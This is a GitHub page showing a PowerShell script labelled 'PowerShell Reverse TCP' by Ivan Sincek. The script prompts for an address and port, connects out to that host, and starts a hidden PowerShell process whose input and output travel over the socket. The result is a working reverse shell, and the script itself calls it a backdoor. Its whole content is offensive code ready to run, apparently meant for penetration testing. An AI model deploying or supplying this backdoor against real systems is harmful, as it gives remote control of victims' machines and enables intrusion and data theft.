-
Notifications
You must be signed in to change notification settings - Fork 65
/
powershell_reverse_tcp_prompt.ps1
101 lines (101 loc) · 3.43 KB
/
powershell_reverse_tcp_prompt.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
$addr = $(Read-Host -Prompt "Enter address").Trim();
Write-Host "";
$port = $(Read-Host -Prompt "Enter port number").Trim();
Write-Host "";
if ($addr.Length -lt 1 -or $port.Length -lt 1) {
Write-Host "Both parameters are required";
} else {
Write-Host "PowerShell Reverse TCP v4.0 by Ivan Sincek.";
Write-Host "GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.";
$client = $stream = $buffer = $writer = $process = $stderr = $stdout = $stderrEvent = $stdoutEvent = $null;
try {
$client = New-Object Net.Sockets.TcpClient($addr, $port);
$stream = $client.GetStream();
$stream.ReadTimeout = 5;
$buffer = New-Object Byte[] 1024;
$writer = New-Object IO.StreamWriter($stream, [Text.Encoding]::UTF8, 1024);
$writer.AutoFlush = $true;
# start process
$process = New-Object Diagnostics.Process;
$process.StartInfo = New-Object Diagnostics.ProcessStartInfo;
$process.StartInfo.FileName = "powershell";
$process.StartInfo.CreateNoWindow = $true;
$process.StartInfo.WindowStyle = [Diagnostics.ProcessWindowStyle]::Hidden;
$process.StartInfo.UseShellExecute = $false;
$process.StartInfo.RedirectStandardInput = $process.StartInfo.RedirectStandardError = $process.StartInfo.RedirectStandardOutput = $true;
# suppress possible errors
$process.StartInfo.ErrorDialog = $false;
$process.EnableRaisingEvents = $false;
$stderr = New-Object Text.StringBuilder;
$stdout = New-Object Text.StringBuilder;
$scriptBlock = {
if ($EventArgs.Data.Length -gt 0) {
$Event.MessageData.AppendLine($EventArgs.Data);
}
};
$stderrEvent = Register-ObjectEvent -InputObject $process -EventName "ErrorDataReceived" -Action $scriptBlock -MessageData $stderr;
$stdoutEvent = Register-ObjectEvent -InputObject $process -EventName "OutputDataReceived" -Action $scriptBlock -MessageData $stdout;
$process.Start() | Out-Null;
$process.BeginErrorReadLine();
$process.BeginOutputReadLine();
Write-Host "Backdoor is up and running...";
Write-Host "";
while (!$process.HasExited) {
try {
$bytes = $stream.Read($buffer, 0, $buffer.Length); # unblock with timeout
if ($bytes -gt 0) {
$process.StandardInput.Write($buffer, 0, $bytes);
} else { break; }
} catch [Management.Automation.MethodInvocationException] {}
if ($stderr.Length -gt 0) {
$writer.Write($stdout.ToString()); $stdout.clear();
}
if ($stdout.Length -gt 0) {
$writer.Write($stdout.ToString()); $stdout.clear();
}
}
Write-Host "Backdoor will now exit...";
} catch {
Write-Host $_.Exception.InnerException.Message;
} finally {
if ($stderrEvent -ne $null) {
Unregister-Event -SourceIdentifier $stderrEvent.Name;
Clear-Variable stderrEvent;
}
if ($stdoutEvent -ne $null) {
Unregister-Event -SourceIdentifier $stdoutEvent.Name;
Clear-Variable stdoutEvent;
}
if ($process -ne $null) {
$process.Close(); $process.Dispose();
Clear-Variable process;
}
if ($writer -ne $null) {
$writer.Close(); $writer.Dispose();
Clear-Variable writer;
}
if ($stream -ne $null) {
$stream.Close(); $stream.Dispose();
Clear-Variable stream;
}
if ($client -ne $null) {
$client.Close(); $client.Dispose();
Clear-Variable client;
}
if ($buffer -ne $null) {
$buffer.Clear();
Clear-Variable buffer;
}
if ($stderr -ne $null) {
$stderr.Clear();
Clear-Variable stderr;
}
if ($stdout -ne $null) {
$stdout.Clear();
Clear-Variable stdout;
}
[GC]::Collect();
}
}
Clear-Variable addr;
Clear-Variable port;